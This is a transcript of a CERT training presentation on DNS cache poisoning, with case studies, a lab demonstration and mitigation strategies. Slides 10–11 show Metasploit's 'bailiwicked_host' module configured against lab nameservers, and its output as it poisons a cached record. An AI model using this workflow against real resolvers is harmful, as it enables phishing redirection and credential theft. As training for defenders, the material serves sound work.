day 2 dns cert 4a cache poisoning
DESCRIPTION
Presentation by ICANNTRANSCRIPT
DNS Security for CERTs- Attack Scenarios & Demonstrations –
Cache Poisoning
Chris EvansDelta Risk, LLC
7 March 2010
1
What You Will Need for the Exercise
• Your Ubuntu VM
– VMWare Web Console Access
– SSH with X11 Forwarding (for Advanced Users)
• Do a query for www.tld1 and verify its IP address before the attack is launched:
– 192.168.101.50
2
Description
• A Change in Recursive DNS Server Causes Spoofed or Incorrect Resolutions– Attack Doesn’t Target Registry Architecture
3
ISP 2
ISP 1Google.com
Fake Google
DNS
DNS
Resolves Differently Than
Description
• Cache poisoning attacks target a specific DNS server, and therefore, only the users which use that DNS server– This doesn’t fit the “get most bang for the buck” of typical
hackers out for fame and glory
– BUT, the attack can be very insidious, difficult to detect and completely transparent to the victim
• These attacks occur infrequently, or, are just not being detected and reported.
4
Case Study – External Poisoning
• Unverified report of a Brazilian bank victimized by cache poisoning attack.
• Attack targeted local ISP DNS server
• ISP reported only “1%” of its users were affected
5
Eweek.com 4/22/09
Case Study – External Poisoning
• Hackers poisoned local ISP DNS server and redirected users to a login page that looked just like the Bank’s login page
• Solicited usernames, passwords, and other information not normally asked for by the Bank at login
6
Actual Bradesco Login Page
Case Study – Internal Poisoning
• Partido Colorado – political statement made by one organization against another during an election
7
Attacker Modifies Upstream DNS Records
www.partidocolorado.org. 3600 IN A 66.249.01.121
Case Study – Internal Poisoning
• The local ISP (Copaco) modified its own recursive name servers to redirect users looking for partidocolorado.org to a state-run news service
8
Attacker Modified Upstream DNS Records
www.partidocolorado.org. 3600 IN A 66.249.01.121
201.217.51.114
Attack Demonstration
9
DNS
Server
DNS Cache
Web Server
Hacker
Web Server
Victim
External Poisoning
Normal
Request
Poisoned
Request
Demonstration – Attacker View
10
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
=[ 99 aux
msf auxiliary(bailiwicked_host) > Name: DNS BailiWicked Host Attack
Version: 5794
Provided by:
I)ruid <[email protected]>
hdm <[email protected]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HOSTNAME www.tld1 yes Hostname to hijack
NEWADDR 192.168.85.5 yes New address for hostname
RECONS 192.168.101.10 yes The nameserver used for recon
RHOST 192.168.80.10 yes The target address
SRCADDR Real yes The source address to use for
SRCPORT 53 yes The target server's source
TTL 37620 yes The TTL for the malicious host
XIDS 0 yes The number of XIDs to try for
Demonstration – Attacker View (cont.)
11
[*] Targeting nameserver 192.168.80.10 for injection of www.tld1. as 192.168.85.5
[*] Querying recon nameserver for tld1.'s nameservers...
[*] Got an NS record: tld1. 180 IN NS ns1.tld1.
[*] Querying recon nameserver for address of ns1.tld1....
[*] Got an A record: ns1.tld1. 180 IN A 192.168.101.10
[*] Checking Authoritativeness: Querying 192.168.101.10 for tld1....
[*] ns1.tld1. is authoritative for tld1., adding to list of nameservers to spoof as
[*] Calculating the number of spoofed replies to send per query...
[*] race calc: 100 queries | min/max/avg time: 0.0/0.06/0.0 | min/max/avg replies: 0/6/3
[*] Sending 4 spoofed replies from each nameserver (1) for each query
[*] Attempting to inject a poison record for www.tld1. into 192.168.80.10:53...
...
...
...
...
[*] Poisoning successful after 61000 queries and 250000 responses: www.tld1 == 192.168.85.5
[*] TTL: 37619 DATA: #<Resolv::DNS::Resource::IN::A:0xb6b28688>
[*] Auxiliary module execution completed
Attack
Successful!!!!!
Demonstration – Server View
• Wireshark Capture
– Note the queries like “031PtyJamG6o.tld1”
12
Demonstration – User View
• Please open a browser and connect to the webmail server: http://192.168.101.50/squirrelmail
– Login as: studentX
– Password: password
• Examine the message in your inbox
– Looks realistic? ( Use your imagination )
– The URL certainly does – it matches the web registry system URL.
• Click on the link (it won’t hurt you!)
– Does this look like the login page of the web registry system?
13
Demonstration – User View
14
1
2
3
May look legit
but is the
hacker’s IP and
webserver!!!!!
Impact
• Users are dependent on the answers from the DNS being accurate and legitimate
• Cache Poisoning can be used to create very realistic phishing attacks, that are more likely to succeed, because they appear to use real URLs.
– Users are more attune to “strange” URLs now than several years ago, but cache poisoning allows an attacker to use a “normal” URL
15
Mitigation & Response Strategies
• DNSSEC – will mitigate effect of external poisoning attacks, but will not address content “issues” at the authoritative server
• SSL-Based Logins – but subject to user participation!
• Server validation techniques like “site keys” – but again, subject to user participation!
• Proactive monitoring of recursive servers – not necessarily tractable – but maybe useful for High Value Domains
16
Mitigation & Response Strategies
• Know WHO to contact at the ISPs within your span of control
• Know the procedures for flushing the DNS cache –you may have to instruct operators how to do this!
• Information Sharing – if you’re the victim of an attack – share the details of the attack within the community – you may prevent someone else from becoming a victim
17
Questions?
18
?